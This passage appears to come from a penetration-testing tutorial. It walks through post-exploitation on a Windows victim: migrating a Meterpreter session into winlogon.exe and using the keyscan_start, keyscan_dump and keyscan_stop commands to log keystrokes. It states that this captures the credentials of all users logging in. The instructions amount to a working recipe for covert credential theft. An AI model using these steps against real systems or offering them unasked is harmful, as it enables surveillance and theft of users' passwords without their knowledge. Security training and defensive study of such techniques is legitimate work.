The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger
Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes
Keyscan_stop – to stop the keylogger
This will capture the credentials of all users logging into the system as long as this is running.